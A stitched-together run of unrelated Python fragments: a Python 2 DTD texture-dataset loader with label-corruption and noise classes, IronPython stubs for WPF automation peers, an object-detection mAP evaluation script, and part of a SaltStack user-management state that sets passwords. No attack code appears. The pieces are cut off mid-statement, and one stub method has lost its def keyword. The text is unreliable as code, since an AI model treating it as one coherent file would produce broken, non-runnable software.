{}".format(no) train_split_file = '{}/dtd/labels/train{}.txt'.format(source, no) f = open(train_split_file, "r") training_img_names = [line.strip('\n') for line in f.readlines()] #import pdb; pdb.set_trace() val_split_file = '{}/dtd/labels/val{}.txt'.format(source, no) fv = open(val_split_file, "r") validation_img_names = [line.strip('\n') for line in fv.readlines()] test_split_file = '{}/dtd/labels/test{}.txt'.format(source, no) fte = open(test_split_file, "r") testing_img_names = [line.strip('\n') for line in fte.readlines()] all_img_names = training_img_names+validation_img_names+testing_img_names max_height, max_width = check_max_img_size(all_img_names, source) print max_height, max_width ''' training_images = np.zeros((len(training_img_names), 299,299,3), dtype='uint8') validation_images = np.zeros((len(validation_img_names), 299,299,3), dtype='uint8') testing_images = np.zeros((len(testing_img_names), 299,299,3), dtype='uint8') ''' training_images = np.zeros((len(training_img_names), max_height,max_width,4), dtype='uint8') validation_images = np.zeros((len(validation_img_names), 299,299,3), dtype='uint8') testing_images = np.zeros((len(testing_img_names), 299,299,3), dtype='uint8') ''' training_images[:,:,0] +=1 validation_images[:,:,0] +=1 testing_images[:,:,0] +=1 ''' ''' training_images_mask = training_images[:,:,0] validation_images_mask = validation_images[:,:,0] testing_images_mask = testing_images[:,:,0] ''' training_labels = [] validation_labels = [] testing_labels = [] i=0 for img_name in training_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) ''' width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) ''' nimg = np.asarray(img) nimg_shape = nimg.shape #import pdb; pdb.set_trace() training_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3] = nimg training_images[i, 0:nimg_shape[0]:, 
0:nimg_shape[1], -1] = 1 #import pdb; pdb.set_trace() #training_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 i+=1 training_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) #print nimg.shape i=0 for img_name in validation_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) nimg = np.asarray(img) nimg_shape = nimg.shape validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3]=nimg #validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], -1]=1 #validation_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 i+=1 #validation_images.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) #validation_images[i]=nimg #i+=1 validation_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) i=0 for img_name in testing_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) nimg= np.asarray(img) nimg_shape = nimg.shape testing_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3]=nimg #testing_images[i, 0:nimg_shape[0], 0:nimg_shape[1], -1]=1 #testing_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 #testing_/\/images[i]=nimg i+=1 testing_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) return (np.asarray(training_images, dtype='uint8'), training_labels), \ (np.asarray(validation_images, dtype='uint8'), validation_labels), \ (np.asarray(testing_images, dtype='uint8'), testing_labels) #(training_images_mask, validation_images_mask, testing_images_mask) def load_val_split(no, source, textures): print "Loading split no. 
{}".format(no) val_split_file = '{}/dtd/labels/val{}.txt'.format(source, no) fv = open(val_split_file, "r") validation_img_names = [line.strip('\n') for line in fv.readlines()] validation_images = np.zeros((len(validation_img_names), 299,299,3), dtype='uint8') validation_labels = [] i=0 for img_name in validation_img_names[:]: img = PIL.Image.open('{}/dtd/images/{}'.format(source, img_name)) width, height = img.size # Get dimensions left = (width - 299)/2 top = (height - 299)/2 right = (width + 299)/2 bottom = (height + 299)/2 img = img.crop((left, top, right, bottom)) nimg = np.asarray(img) nimg_shape = nimg.shape validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], :3]=nimg #validation_images[i, 0:nimg_shape[0], 0:nimg_shape[1], -1]=1 #validation_images_mask[i, 0:nimg_shape[0], 0:nimg_shape[1], :] = 1 i+=1 #validation_images.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) #validation_images[i]=nimg #i+=1 validation_labels.append(np.argwhere(np.asarray(textures)==img_name.split('/')[0])[0][0]) return (np.asarray(validation_images, dtype='uint8'), validation_labels) ''' Datasets ''' class ImageNet10Random(): ''' Params corrupted: float Default 0.0 num_classes: int Default 10. 
''' def __init__(self, label_corrupt_p=0.0, gaussian_noise_f = 0.0, classes=[], path_to_train='', path_to_val='', random_seed=1, **kwargs): (self.x_train, self.y_train), (self.x_test, self.y_test) = get_imgnt_datasets(classes, path_to_train, path_to_val) self.num_classes = len(classes) self._train_mask = np.zeros(len(self.y_train)) self.seed = random_seed if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f) def label_corrupt(self, corrupted): # Corrupts the labels in the training set according to # the specified corruption probability labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(self.seed) mask = np.random.rand(len(labels)) <= corrupted true_labels = labels[mask] print true_labels, np.shape(true_labels) np.random.shuffle(true_labels) print true_labels, np.shape(true_labels) #rnd_labels = np.random.choice(self.num_classes, mask.sum()) #rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) #labels[mask] = rnd_labels labels[mask] = true_labels #labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask #saving which labels were actually perturbed def gaussian_noise(self, gaussian_noise_f): # Adds Gaussian Noise to the images, # matching the real dataset's mean and variance data = np.array(self.x_train) mean = np.mean(data) var = np.std(data) sigma = var**0.5 n_samples, row, col, ch = data.shape mask = np.random.rand(n_samples) <= gaussian_noise_f gaussian = np.random.normal(mean, sigma, (row, col, ch)) gaussian = gaussian.reshape(row, col, ch) noisy_imgs = [x+gaussian for x in data[mask]] data[mask] = noisy_imgs self.x_train = data class CIFAR10Random(): ''' Params corrupted: float Default 0.0 num_classes: int Default 10. 
''' def __init__(self, label_corrupt_p=0.0, gaussian_noise_f = 0.0, num_classes=10, random_seed=1, **kwargs): #super(CIFAR10Random, self).__init__(**kwargs) (self.x_train, self.y_train), (self.x_test, self.y_test) = keras.datasets.cifar10.load_data() self.num_classes = num_classes #import pdb; pdb.set_trace() self.y_train = self.y_train.T[0] self.y_test = self.y_test.T[0] self._train_mask = np.zeros(len(self.y_train)) #to save which examples were corrupted, if any self.seed = random_seed # note: corruption is performed on the training set. # you test on real data to check generalization if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f) def label_corrupt(self, corrupted): ## NEW VERSION # Corrupts the labels in the training set according to # the specified corruption probability print 'NEW VERS' labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(self.seed) mask = np.random.rand(len(labels)) <= corrupted #rnd_labels = np.random.choice(self.num_classes, mask.sum()) true_labels = labels[mask] #rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) #labels[mask] = rnd_labels print true_labels print np.shape(true_labels) np.random.shuffle(true_labels) print true_labels print np.shape(true_labels) labels[mask] = true_labels #labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask ''' # Corrupts the labels in the training set according to # the specified corruption probability labels=np.array(self.y_train) #labels = np.reshape(len(labels),1) np.random.seed(1) mask = np.random.rand(len(labels)) <= corrupted rnd_labels = np.random.choice(self.num_classes, mask.sum()) rnd_labels = np.reshape(rnd_labels, (len(rnd_labels),1)) labels[mask] = rnd_labels labels = [int(x) for x in labels] # corruption self.y_train = labels self.train_mask = mask #saving which labels were actually perturbed ''' def gaussian_noise(self, gaussian_noise_f): # 
Adds Gaussian Noise to the images, # matching the real dataset's mean and variance data = np.array(self.x_train) mean = np.mean(data) var = np.std(data) sigma = var**0.5 n_samples, row, col, ch = data.shape mask = np.random.rand(n_samples) <= gaussian_noise_f gaussian = np.random.normal(mean, sigma, (row, col, ch)) gaussian = gaussian.reshape(row, col, ch) noisy_imgs = [x+gaussian for x in data[mask]] data[mask] = noisy_imgs self.x_train = data class MNISTRandom(): ''' Params corrupted: float Default 0.0 num_classes: int Default 10. ''' def __init__(self, label_corrupt_p=0.0, gaussian_noise_f = 0.0, num_classes=10, **kwargs): (self.x_train, self.y_train), (self.x_test, self.y_test) = keras.datasets.mnist.load_data() self.num_classes = num_classes # note: corruption is performed on the training set. # you test on real data to check generalization if label_corrupt_p > 0.0: self.label_corrupt(label_corrupt_p) if gaussian_noise_f > 0.0: self.gaussian_noise(gaussian_noise_f)
    # NOTE(review): auto-generated IronPython stub fragment for the WPF
    # automation-peer classes (System.Windows.Automation.Peers).  This chunk
    # is torn mid-definition at both ends: the first method below lost its
    # `def` keyword in an earlier line, and the last one is cut off
    # mid-comment.  All bodies are `pass` stubs; the docstrings carry the
    # CLR signatures.
    GetLabeledByCore(self, *args): #cannot find CLR method
        """GetLabeledByCore(self: ItemAutomationPeer) -> AutomationPeer

        Gets the AutomationPeer for the Label that is targeted to the
        specified UIElement.
        """
        pass

    def GetLocalizedControlTypeCore(self, *args): #cannot find CLR method
        """GetLocalizedControlTypeCore(self: AutomationPeer) -> str

        Called by AutomationPeer.GetLocalizedControlType; returns the type of
        the control.
        """
        pass

    def GetNameCore(self, *args): #cannot find CLR method
        """GetNameCore(self: ItemAutomationPeer) -> str

        Gets the text label of the UIElement that corresponds to the data
        item in ItemsControl.Items associated with this ItemAutomationPeer.
        """
        pass

    def GetOrientationCore(self, *args): #cannot find CLR method
        """GetOrientationCore(self: ItemAutomationPeer) -> AutomationOrientation

        Gets the layout direction of the specified UIElement, or
        AutomationOrientation.None when no particular direction applies.
        """
        pass

    def GetPattern(self, patternInterface):
        """GetPattern(self: ListBoxItemAutomationPeer, patternInterface: PatternInterface) -> object

        Gets the control pattern for the associated ListBoxItem.  For
        PatternInterface.ScrollItem, returns this ListBoxItemAutomationPeer
        instance.
        """
        pass

    def GetPeerFromPointCore(self, *args): #cannot find CLR method
        """GetPeerFromPointCore(self: AutomationPeer, point: Point) -> AutomationPeer"""
        pass

    def HasKeyboardFocusCore(self, *args): #cannot find CLR method
        """HasKeyboardFocusCore(self: ItemAutomationPeer) -> bool

        True if the specified UIElement currently has keyboard input focus.
        """
        pass

    def IsContentElementCore(self, *args): #cannot find CLR method
        """IsContentElementCore(self: ItemAutomationPeer) -> bool

        True if the specified UIElement contains data presented to the user.
        """
        pass

    def IsControlElementCore(self, *args): #cannot find CLR method
        """IsControlElementCore(self: ItemAutomationPeer) -> bool

        True if the associated UIElement is understood by the end user as
        interactive (a control).
        """
        pass

    def IsEnabledCore(self, *args): #cannot find CLR method
        """IsEnabledCore(self: ItemAutomationPeer) -> bool

        True if the UI Automation peer can receive and send events.
        """
        pass

    def IsKeyboardFocusableCore(self, *args): #cannot find CLR method
        """IsKeyboardFocusableCore(self: ItemAutomationPeer) -> bool

        True if the specified UIElement can accept keyboard focus.
        """
        pass

    def IsOffscreenCore(self, *args): #cannot find CLR method
        """IsOffscreenCore(self: ItemAutomationPeer) -> bool

        True if the specified UIElement is not on the screen.
        """
        pass

    def IsPasswordCore(self, *args): #cannot find CLR method
        """IsPasswordCore(self: ItemAutomationPeer) -> bool

        True if the specified UIElement contains protected content.
        """
        pass

    def IsRequiredForFormCore(self, *args): #cannot find CLR method
        """IsRequiredForFormCore(self: ItemAutomationPeer) -> bool

        True if the specified UIElement is required to be completed on a form.
        """
        pass

    def PeerFromProvider(self, *args): #cannot find CLR method
        """PeerFromProvider(self: AutomationPeer, provider: IRawElementProviderSimple) -> AutomationPeer

        Gets an AutomationPeer for the specified IRawElementProviderSimple
        proxy.
        """
        pass

    def ProviderFromPeer(self, *args): #cannot find CLR method
        """ProviderFromPeer(self: AutomationPeer, peer: AutomationPeer) -> IRawElementProviderSimple

        Gets the IRawElementProviderSimple proxy for the specified
        AutomationPeer.
        """
        pass

    def SetFocusCore(self, *args): #cannot find CLR method
        """SetFocusCore(self: ItemAutomationPeer)

        Sets keyboard input focus on the UIElement corresponding to the data
        item associated with this ItemAutomationPeer.
        """
        pass

    def __init__(self, *args): #cannot find CLR method
        """x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
        pass

    @staticmethod # known case of __new__
    def __new__(self, owner, selectorAutomationPeer):
        """__new__(cls: type, owner: object, selectorAutomationPeer: SelectorAutomationPeer)"""
        pass

    IsHwndHost = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
    """Gets a value that indicates whether the element that is associated with
    this AutomationPeer hosts hwnds in Windows Presentation Foundation (WPF)."""


class GridViewItemAutomationPeer(ListBoxItemAutomationPeer, IVirtualizedItemProvider, ISelectionItemProvider, IScrollItemProvider):
    """Exposes the data items of ItemsControl.Items in GridView types to UI
    Automation.

    GridViewItemAutomationPeer(owner: object, listviewAP: ListViewAutomationPeer)
    """

    def GetAcceleratorKeyCore(self, *args): #cannot find CLR method
        """GetAcceleratorKeyCore(self: ItemAutomationPeer) -> str

        Gets the accelerator key for the UIElement corresponding to the data
        item associated with this ItemAutomationPeer.
        """
        pass

    def GetAccessKeyCore(self, *args): #cannot find CLR method
        """GetAccessKeyCore(self: ItemAutomationPeer) -> str

        Gets the access key for the UIElement corresponding to the data item
        associated with this ItemAutomationPeer.
        """
        pass

    def GetAutomationControlTypeCore(self, *args): #cannot find CLR method
        """GetAutomationControlTypeCore(self: GridViewItemAutomationPeer) -> AutomationControlType

        Called by AutomationPeer.GetAutomationControlType; returns
        AutomationControlType.DataItem.
        """
        pass

    def GetAutomationIdCore(self, *args): #cannot find CLR method
        """GetAutomationIdCore(self: ItemAutomationPeer) -> str

        Gets the string that uniquely identifies the corresponding UIElement
        (the UI Automation identifier).
        """
        pass

    def GetBoundingRectangleCore(self, *args): #cannot find CLR method
        """GetBoundingRectangleCore(self: ItemAutomationPeer) -> Rect

        Gets the bounding rectangle of the specified UIElement.
        """
        pass

    def GetChildrenCore(self, *args): #cannot find CLR method
        """GetChildrenCore(self: GridViewItemAutomationPeer) -> List[AutomationPeer]

        Called by AutomationPeer.GetChildren; returns the collection of child
        elements of the associated ItemsControl.Items collection.
        """
        pass

    def GetClassNameCore(self, *args): #cannot find CLR method
        """GetClassNameCore(self: GridViewItemAutomationPeer) -> str

        Called by AutomationPeer.GetClassName; returns "ListViewItem".
        """
        pass

    def GetClickablePointCore(self, *args): #cannot find CLR method
        """GetClickablePointCore(self: ItemAutomationPeer) -> Point

        Gets the Point representing the clickable space on the specified
        UIElement.
        """
        pass

    def GetHelpTextCore(self, *args): #cannot find CLR method
        """GetHelpTextCore(self: ItemAutomationPeer) -> str

        Gets the help text describing the functionality of the corresponding
        UIElement.
        """
        pass

    def GetHostRawElementProviderCore(self, *args): #cannot find CLR method
        """GetHostRawElementProviderCore(self: AutomationPeer) -> HostedWindowWrapper

        Tells UI Automation where in the tree to place the hwnd hosted by a
        WPF element; returns the hosted hwnd for controls hosting hwnds.
        """
        pass

    # NOTE(review): the chunk is truncated here -- GetItemStatusCore's comment
    # and body continue in a part of the file that is out of view.
    def GetItemStatusCore(self, *args): #cannot find
# <gh_stars>0  -- dataset artifact from the original source, kept as a comment
import glob
import json
import os
import shutil
import operator
import sys
import argparse
import math
import numpy as np
from copy import deepcopy

parser = argparse.ArgumentParser()
parser.add_argument('-na', '--no-animation', help="no animation is shown.", action="store_true")
parser.add_argument('-np', '--no-plot', help="no plot is shown.", action="store_true")
parser.add_argument('-q', '--quiet', help="minimalistic console output.", action="store_true")
# argparse receiving list of classes to be ignored (e.g., python main.py --ignore person book)
parser.add_argument('-i', '--ignore', nargs='+', type=str, help="ignore a list of classes.")
# argparse receiving list of classes with specific IoU (e.g., python main.py --set-class-iou person 0.7)
parser.add_argument('--set-class-iou', nargs='+', type=str, help="set IoU for a specific class.")
parser.add_argument('--classes', type=str, help='names of classes as "name1,name2" in order as in labels.txt ')
parser.add_argument('--train-gt-folder', type=str, help='folder containing training labels')
parser.add_argument('--log', type=str, help='just a text inserted into logs')
args = parser.parse_args()

'''
 0,0 ------> x (width)
  |
  |   (Left,Top)
  |      *_________
  |      |         |
  y      |_________|
(height)           *
              (Right,Bottom)
'''

# if there are no classes to ignore then replace None by empty list
if args.ignore is None:
    args.ignore = []

specific_iou_flagged = False
if args.set_class_iou is not None:
    specific_iou_flagged = True

# make sure that the cwd() is the location of the python script (so that every path makes sense)
os.chdir(os.path.dirname(os.path.abspath(__file__)))

GT_PATH = os.path.join(os.getcwd(), 'input', 'ground-truth')
DR_PATH = os.path.join(os.getcwd(), 'input', 'detection-results')
# if there are no images then no animation can be shown
IMG_PATH = os.path.join(os.getcwd(), 'input', 'images-optional')
if os.path.exists(IMG_PATH):
    for dirpath, dirnames, files in os.walk(IMG_PATH):
        if not files:
            # no image files found
            args.no_animation = True
else:
    args.no_animation = True

# try to import OpenCV if the user didn't choose the option --no-animation
show_animation = False
if not args.no_animation:
    try:
        import cv2
        show_animation = True
    except ImportError:
        print("\"opencv-python\" not found, please install to visualize the results.")
        args.no_animation = True

# try to import Matplotlib if the user didn't choose the option --no-plot
draw_plot = False
if not args.no_plot:
    try:
        import matplotlib.pyplot as plt
        draw_plot = True
    except ImportError:
        print("\"matplotlib\" not found, please install it to get the resulting plots.")
        args.no_plot = True


def log_average_miss_rate(prec, rec, num_images):
    """Compute the log-average miss rate of a detector.

    Averages miss rates at 9 evenly spaced FPPI points between 1e-2 and 1e0
    in log-space.  `num_images` is unused here but kept for interface
    compatibility with callers.

    Returns (lamr, mr, fppi):
        lamr -- log-average miss rate (scalar)
        mr   -- miss-rate curve
        fppi -- false positives per image curve

    Reference: Dollar et al., "Pedestrian Detection: An Evaluation of the
    State of the Art", TPAMI 34(4), 2012, pp. 743-761.
    """
    # if there were no detections of that class
    if prec.size == 0:
        lamr = 0
        mr = 1
        fppi = 0
        return lamr, mr, fppi

    fppi = (1 - prec)
    mr = (1 - rec)

    # Sentinels guarantee np.where below always finds at least one index.
    fppi_tmp = np.insert(fppi, 0, -1.0)
    mr_tmp = np.insert(mr, 0, 1.0)

    # Use 9 evenly spaced reference points in log-space.
    ref = np.logspace(-2.0, 0.0, num=9)
    for i, ref_i in enumerate(ref):
        # np.where() will always find at least 1 index, since min(ref) = 0.01
        # and min(fppi_tmp) = -1.0
        j = np.where(fppi_tmp <= ref_i)[-1][-1]
        ref[i] = mr_tmp[j]

    # log(0) is undefined, so clamp with np.maximum(1e-10, ref).
    lamr = math.exp(np.mean(np.log(np.maximum(1e-10, ref))))
    return lamr, mr, fppi


def error(msg):
    """Print an error message and exit.

    NOTE(review): exits with status 0 even though this is an error path --
    kept for backward compatibility, but callers checking the exit status
    will not see a failure.  Consider sys.exit(1).
    """
    print(msg)
    sys.exit(0)


def is_float_between_0_and_1(value):
    """Return True if `value` parses as a float strictly between 0.0 and 1.0."""
    try:
        val = float(value)
    except ValueError:
        return False
    return 0.0 < val < 1.0


def voc_ap(rec, prec):
    """Compute VOC2012-style Average Precision from recall/precision lists.

    1st) Make the precision curve monotonically decreasing.
    2nd) Integrate the area under the curve numerically.

    --- Official matlab code VOC2012 ---
        mrec=[0 ; rec ; 1];  mpre=[0 ; prec ; 0];
        for i=numel(mpre)-1:-1:1
            mpre(i)=max(mpre(i),mpre(i+1));
        end
        i=find(mrec(2:end)~=mrec(1:end-1))+1;
        ap=sum((mrec(i)-mrec(i-1)).*mpre(i));

    Returns (ap, mrec, mpre).
    """
    # FIX: work on copies -- the original inserted/appended into the caller's
    # lists, mutating them as a side effect.
    rec = list(rec)
    prec = list(prec)
    rec.insert(0, 0.0)   # insert 0.0 at beginning of list
    rec.append(1.0)      # insert 1.0 at end of list
    mrec = rec[:]
    prec.insert(0, 0.0)  # insert 0.0 at beginning of list
    prec.append(0.0)     # insert 0.0 at end of list
    mpre = prec[:]

    # Make precision monotonically decreasing, going from end to beginning.
    # (matlab indexes start at 1, python at 0, hence the shifted range.)
    for i in range(len(mpre) - 2, -1, -1):
        mpre[i] = max(mpre[i], mpre[i + 1])

    # Indexes where the recall changes (matlab: find(mrec(2:end)~=mrec(1:end-1))+1).
    i_list = []
    for i in range(1, len(mrec)):
        if mrec[i] != mrec[i - 1]:
            i_list.append(i)  # in matlab this would be i + 1

    # AP = area under the curve (numerical integration).
    ap = 0.0
    for i in i_list:
        ap += ((mrec[i] - mrec[i - 1]) * mpre[i])
    return ap, mrec, mpre


def compute_ap(recall, precision):
    """Compute the average precision, given the recall and precision curves.

    # Arguments
        recall:    The recall curve (list)
        precision: The precision curve (list)
    # Returns
        Average precision, precision curve, recall curve
    """
    # Append sentinel values to beginning and end.
    mrec = np.concatenate(([0.0], recall, [1.0]))
    mpre = np.concatenate(([1.0], precision, [0.0]))

    # Compute the precision envelope (monotonically decreasing).
    mpre = np.flip(np.maximum.accumulate(np.flip(mpre)))

    # Integrate area under curve.
    method = 'interp'  # methods: 'continuous', 'interp'
    if method == 'interp':
        x = np.linspace(0, 1, 101)  # 101-point interp (COCO)
        ap = np.trapz(np.interp(x, mrec, mpre), x)  # integrate
    else:  # 'continuous'
        i = np.where(mrec[1:] != mrec[:-1])[0]  # points where x axis (recall) changes
        ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])  # area under curve
    return ap, mrec, mpre


def file_lines_to_list(path):
    """Return the lines of the text file at `path` as a stripped list."""
    with open(path) as f:
        content = f.readlines()
    # remove whitespace characters like `\n` at the end of each line
    return [x.strip() for x in content]


def draw_text_in_image(img, text, pos, color, line_width):
    """Draw `text` on `img` at `pos`; return (img, new line width)."""
    font = cv2.FONT_HERSHEY_PLAIN
    fontScale = 1
    lineType = 1
    bottomLeftCornerOfText = pos
    # NOTE(review): cv2.putText's 7th positional parameter is `thickness`,
    # not lineType -- the original passes lineType there.  Kept as-is since
    # both values are 1 here.
    cv2.putText(img, text, bottomLeftCornerOfText, font, fontScale, color, lineType)
    text_width, _ = cv2.getTextSize(text, font, fontScale, lineType)[0]
    return img, (line_width + text_width)


def adjust_axes(r, t, fig, axes):
    """Widen the x-axis so the text `t` fits inside the figure."""
    # get text width for re-scaling
    bb = t.get_window_extent(renderer=r)
    text_width_inches = bb.width / fig.dpi
    # get axis width in inches
    current_fig_width = fig.get_figwidth()
    new_fig_width = current_fig_width + text_width_inches
    proportion = new_fig_width / current_fig_width
    # stretch the x-axis limit by the same proportion
    x_lim = axes.get_xlim()
    axes.set_xlim([x_lim[0], x_lim[1] * proportion])


def draw_plot_func(dictionary, n_classes, window_title, plot_title, x_label, output_path, to_show, plot_color, true_p_bar):
    """Draw a horizontal bar plot of `dictionary` using Matplotlib.

    When `true_p_bar` is non-empty, each bar is split into green (TP: detected
    and matching ground-truth), red (FP: detected but no match); FN would be
    pink per the original comment.
    """
    # sort the dictionary by decreasing value, into a list of tuples
    sorted_dic_by_value = sorted(dictionary.items(), key=operator.itemgetter(1))
    # unpacking the list of tuples into two lists
    sorted_keys, sorted_values = zip(*sorted_dic_by_value)
    if true_p_bar != "":
        # Special case: stacked TP (green) / FP (crimson) bars.
        fp_sorted = []
        tp_sorted = []
        for key in sorted_keys:
            fp_sorted.append(dictionary[key] - true_p_bar[key])
            tp_sorted.append(true_p_bar[key])
        plt.barh(range(n_classes), fp_sorted, align='center', color='crimson', label='False Positive')
        plt.barh(range(n_classes), tp_sorted, align='center', color='forestgreen', label='True Positive', left=fp_sorted)
        # add legend
        plt.legend(loc='lower right')
        # Write number on side of bar.
        fig = plt.gcf()   # gcf - get current figure
        axes = plt.gca()
        r = fig.canvas.get_renderer()
        for i, val in enumerate(sorted_values):
            fp_val = fp_sorted[i]
            tp_val = tp_sorted[i]
            fp_str_val = " " + str(fp_val)
            tp_str_val = fp_str_val + " " + str(tp_val)
            # trick to paint multicolor with offset:
            # first paint everything and then repaint the first number
            t = plt.text(val, i, tp_str_val, color='forestgreen', va='center', fontweight='bold')
            plt.text(val, i, fp_str_val, color='crimson', va='center', fontweight='bold')
            if i == (len(sorted_values) - 1):  # largest bar
                adjust_axes(r, t, fig, axes)
    else:
        plt.barh(range(n_classes), sorted_values, color=plot_color)
        # Write number on side of bar.
        fig = plt.gcf()   # gcf - get current figure
        axes = plt.gca()
        r = fig.canvas.get_renderer()
        for i, val in enumerate(sorted_values):
            str_val = " " + str(val)  # add a space
            # NOTE(review): the source chunk is truncated here -- the rest of
            # draw_plot_func (text placement, titles, saving) is out of view.
only): The below values should be specified as integers. date Date of last change of password, represented in days since epoch (January 1, 1970). mindays The minimum number of days between password changes. maxdays The maximum number of days between password changes. inactdays The number of days after a password expires before an account is locked. warndays Number of days prior to maxdays to warn users. expire Date that account expires, represented in days since epoch (January 1, 1970). The below parameters apply to windows only: win_homedrive (Windows Only) The drive letter to use for the home directory. If not specified the home directory will be a unc path. Otherwise the home directory will be mapped to the specified drive. Must be a letter followed by a colon. Because of the colon, the value must be surrounded by single quotes. ie: - win_homedrive: 'U: .. versionchanged:: 2015.8.0 win_profile (Windows Only) The custom profile directory of the user. Uses default value of underlying system if not set. .. versionchanged:: 2015.8.0 win_logonscript (Windows Only) The full path to the logon script to run when the user logs in. .. versionchanged:: 2015.8.0 win_description (Windows Only) A brief description of the purpose of the users account. .. versionchanged:: 2015.8.0 ''' # First check if a password is set. If password is set, check if # hash_password is True, then hash it. 
if password and hash_password: log.debug('Hashing a clear text password') password = __salt__['<PASSWORD>'](password) if fullname is not None: fullname = sdecode(fullname) if roomnumber is not None: roomnumber = sdecode(roomnumber) if workphone is not None: workphone = sdecode(workphone) if homephone is not None: homephone = sdecode(homephone) # createhome not supported on Windows or Mac if __grains__['kernel'] in ('Darwin', 'Windows'): createhome = False ret = {'name': name, 'changes': {}, 'result': True, 'comment': 'User {0} is present and up to date'.format(name)} # the comma is used to separate field in GECOS, thus resulting into # salt adding the end of fullname each time this function is called for gecos_field in ['fullname', 'roomnumber', 'workphone']: if isinstance(gecos_field, string_types) and ',' in gecos_field: ret['comment'] = "Unsupported char ',' in {0}".format(gecos_field) ret['result'] = False return ret if groups: missing_groups = [x for x in groups if not __salt__['group.info'](x)] if missing_groups: ret['comment'] = 'The following group(s) are not present: ' \ '{0}'.format(','.join(missing_groups)) ret['result'] = False return ret if optional_groups: present_optgroups = [x for x in optional_groups if __salt__['group.info'](x)] for missing_optgroup in [x for x in optional_groups if x not in present_optgroups]: log.debug('Optional group "{0}" for user "{1}" is not ' 'present'.format(missing_optgroup, name)) else: present_optgroups = None # Log a warning for all groups specified in both "groups" and # "optional_groups" lists. 
if groups and optional_groups: for isected in set(groups).intersection(optional_groups): log.warning('Group "{0}" specified in both groups and ' 'optional_groups for user {1}'.format(isected, name)) if gid_from_name: gid = __salt__['file.group_to_gid'](name) changes = _changes(name, uid, gid, groups, present_optgroups, remove_groups, home, createhome, password, enforce_password, empty_password, shell, fullname, roomnumber, workphone, homephone, loginclass, date, mindays, maxdays, inactdays, warndays, expire, win_homedrive, win_profile, win_logonscript, win_description) if changes: if __opts__['test']: ret['result'] = None ret['comment'] = ('The following user attributes are set to be ' 'changed:\n') for key, val in iteritems(changes): if key == 'passwd': val = 'XXX-REDACTED-XXX' elif key == 'group' and not remove_groups: key = 'ensure groups' ret['comment'] += u'{0}: {1}\n'.format(key, val) return ret # The user is present if 'shadow.info' in __salt__: lshad = __salt__['shadow.info'](name) if __grains__['kernel'] in ('OpenBSD', 'FreeBSD'): lcpre = __salt__['user.get_loginclass'](name) pre = __salt__['user.info'](name) for key, val in iteritems(changes): if key == 'passwd' and not empty_password: __salt__['shadow.set_password'](name, password) continue if key == 'passwd' and empty_password: log.warning("No password will be set when empty_password=True") continue if key == 'empty_password' and val: __salt__['shadow.del_password'](name) continue if key == 'date': __salt__['shadow.set_date'](name, date) continue # run chhome once to avoid any possible bad side-effect if key == 'home' and 'homeDoesNotExist' not in changes: if __grains__['kernel'] in ('Darwin', 'Windows'): __salt__['user.chhome'](name, val) else: __salt__['user.chhome'](name, val, persist=False) continue if key == 'homeDoesNotExist': if __grains__['kernel'] in ('Darwin', 'Windows'): __salt__['user.chhome'](name, val) else: __salt__['user.chhome'](name, val, persist=True) if not os.path.isdir(val): 
__salt__['file.mkdir'](val, pre['uid'], pre['gid'], 0o755) continue if key == 'mindays': __salt__['shadow.set_mindays'](name, mindays) continue if key == 'maxdays': __salt__['shadow.set_maxdays'](name, maxdays) continue if key == 'inactdays': __salt__['shadow.set_inactdays'](name, inactdays) continue if key == 'warndays': __salt__['shadow.set_warndays'](name, warndays) continue if key == 'expire': __salt__['shadow.set_expire'](name, expire) continue if key == 'win_homedrive': __salt__['user.update'](name=name, homedrive=val) continue if key == 'win_profile': __salt__['user.update'](name=name, profile=val) continue if key == 'win_logonscript': __salt__['user.update'](name=name, logonscript=val) continue if key == 'win_description': __salt__['user.update'](name=name, description=val) continue if key == 'groups': __salt__['user.ch{0}'.format(key)]( name, val, not remove_groups ) else: __salt__['user.ch{0}'.format(key)](name, val) post = __salt__['user.info'](name) spost = {} if 'shadow.info' in __salt__ and lshad['passwd'] != password: spost = __salt__['shadow.info'](name) if __grains__['kernel'] in ('OpenBSD', 'FreeBSD'): lcpost = __salt__['user.get_loginclass'](name) # See if anything changed for key in post: if post[key] != pre[key]: ret['changes'][key] = post[key] if 'shadow.info' in __salt__: for key in spost: if lshad[key] != spost[key]: if key == 'passwd': ret['changes'][key] = 